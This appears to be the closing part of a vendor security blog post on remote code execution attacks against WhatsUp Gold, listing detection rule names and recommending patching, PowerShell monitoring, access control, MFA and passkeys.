Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities

Observed attack techniques (OAT) detected using Vision One:

• External MSI Package Installation via Msiexec (High)
• Suspicious RAT (SimpleHelp) Installation (Medium)
• Suspicious RAT (AteraAgent) Installation (Medium)
• Suspicious RAT (Splashtop) File Creation (Medium)
• Malicious Software - PUA.Win32.RAdmin.E (Medium)

Please note that in the implementation, NmPoller.exe can execute PowerShell scripts without launching another powershell.exe process. If you can monitor PowerShell scripts with Antimalware Scan Interface (AMSI), verify that all scripts executed by WhatsUp Gold's Active Monitor PowerShell Script function are the ones you expect. To reduce the monitoring effort, it is also a good idea to suspend the use of Active Monitor PowerShell Script function until the latest patch is applied.

Also, because the vulnerability CVE-2024-6670 is described as allowing the compromise of the user account, it is quite possible that attacks would be observed as other events. Considering this, until the latest patch is applied, it is worth tightening access controls to WhatsUp Gold as much as possible and closely monitoring the events of all related processes.

Conclusion

Patch management is still important but always difficult. In this case, the PoC was published several days after the patch was released, and an incident that appeared to be affected by the vulnerability was observed on the same day, just a few hours after published. This observed fact shows that if the vulnerability being fixed is marked as severe, it is strongly encouraged to apply the patch as soon as it is released, even if no PoC is available.

The key to preventing incidents like this are not limited to patch management. There should be several defenses in place in addition patch management. The most common defenses to mitigate risks are access control and multi-factor authentication (MFA), which security teams can apply through best practices like:

• Keeping hosts/services for corporate use under access control instead of public access
  • Do not expose to the public internet the management consoles or API endpoints of products for corporate use to avoid being on threat actors scan lists.
• Enabling MFA for all network logins
  • To prevent account compromise, all user accounts (whether for enterprise or personal use) logging on over the network, or logging into Windows, Linux, or web applications, are encouraged to always have MFA enabled.
  • Of course, do not forget to use a strong password that has never been used in other places.
• Using passkeys
  • If you have the option to use a passkey instead of a password, it would be a good idea to do so.
  • Passkeys use a cryptographic key stored on the device for logins and the key is activated by local authentication such as users' biometric just like unlocking the device. Since no need for any passwords or any typing, it means no strings of characters are involved, it is resistant to phishing.

Maintaining a daily readiness and vigilance against cyberattacks is essential to ensuring that emergency response is targeted only at things that truly require it. We hope that after reading this article, security teams will once again check that no unintended hosts or services are exposed to the public internet as part of their peacetime preparations. This approach is now known as part of attack surface management.

Organizations can also consider powerful security technologies such as Trend Vision One™, which offers multilayered protection and behavior detection, helping block malicious tools and services before they can inflict damage on user machines and systems.

Public link

Please use the above public link if you want to share this noodl on another website.